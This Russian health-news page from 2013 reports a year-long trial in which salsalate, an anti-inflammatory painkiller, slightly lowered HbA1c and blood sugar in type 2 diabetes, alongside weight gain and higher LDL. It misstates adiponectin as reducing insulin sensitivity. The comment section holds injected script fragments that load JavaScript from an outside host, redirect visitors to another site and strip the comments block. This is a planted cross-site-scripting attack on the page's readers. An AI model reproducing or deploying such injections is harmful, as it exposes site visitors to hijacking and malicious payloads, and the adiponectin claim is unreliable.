Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Одним выстрелом двух зайц...  >>  Одним выстрелом двух зайцев! Обезболивающее лечит диабет
 
Обратная связь
 

Одним выстрелом двух зайцев! Обезболивающее лечит диабет

Размер шрифта
31 июля 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

В недавнем американском исследовании выяснилось, что нестероидные противовоспалительные средства (НПВС) могут снижать уровень глюкозы крови у людей с диабетом 2 типа.

«Исследование длилось целый год, и в итоге выяснилось, что салсалат (препарат из группы НПВС) снижает уровень глюкозы крови», – рассказывает доктор Стивен Шэлсон, профессор Гарвардской медицинской школы в Бостоне.

В исследовании приняли участие 286 человек в возрасте от 18 до 75 лет, у каждого из которых был диагностированный сахарный диабет 2 типа. При этом заболевании инсулин (гормон, необходимый для проникновения глюкозы в клетки организма) работает неэффективно, в результате чего уровень сахара крови стабильно повышен. Это в перспективе чревато развитием тяжелых осложнений, как: инфаркт миокарда, инсульт, нефропатия (поражение почек), ретинопатия (поражение сетчатки глаза) и других.

В начале исследования уровень гликированного гемоглобина испытуемых составлял 7-9,5% (при рекомендованной норме – менее 7%). Гликированный гемоглобин – это показатель крови, характеризующий долговременный (а не сиюминутный) уровень глюкозы.

Участники исследования были случайным образом разделены на две группы: первая принимала салсалат в дозе 3,5 грамм в сутки на протяжении 48 недель, вторая – плацебо (таблетки без действующего вещества).

Спустя 48 недель ученые повторно измерили гликированный гемоглобин испытуемых. Оказалось, что у людей из первой группы его уровень в среднем снизился на 0,37%. В плацебо-группе статистически значимых изменений не наблюдалось.

Были отмечены и другие позитивные эффекты в первой группе: снижение уровня сахара крови, мочевой кислоты (химическое соединение, ассоциированное с подагрой), триглицеридов (жиров). Показатели адипонектина (гормона, который снижает чувствительность тканей к инсулину) и гематокрита (доли клеток крови) также улучшились у тех, кто принимал салсалат.

Ложка дегтя

К сожалению, были и негативные последствия. Оказалось, что препарат способствует некоторому повышению массы тела: участники исследования, принимавшие салсалат, в среднем поправились на один килограмм.

Кроме того, прием салсалата был ассоциирован с повышением уровня липопротеинов низкой плотности (ЛПНП) – «плохого» холестерина, который играет ключевую роль в развитии атеросклероза сосудов.

С другой стороны, препарат никак не повлиял на частоту желудочно-кишечных кровотечений, хотя ожидалось повышение риска таковых.

Что в итоге?

Данное исследование представляет огромный интерес, поскольку открывает новую страницу в борьбе с диабетом, с которой, быть может, начнется грандиозная эпопея под названием «Применение обезболивающих в лечении сахарного диабета».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:09

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 19:29

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:09

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как угробить свое сердце?!   Не психуй! Взрывы гнева увеличивают шансы инфаркта!   10 ужасов недосыпа   Худшие соусы  
17 июля 2013Куда смотреть, чтобы мозг заработал? А заодно спасти близкого от инсульта 22 июня 2013Грецкие орехи спасут от инфаркта
 
20 июня 2013Собака спасет от инфаркта! Какую породу завести, чтобы не умереть 18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя?
 

Слайдшоу

1
Не показывайте мужчинам ноги – они выдадут все ваши секреты!
Зачем спать 10 затем
6 суперпродуктов от диабета

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.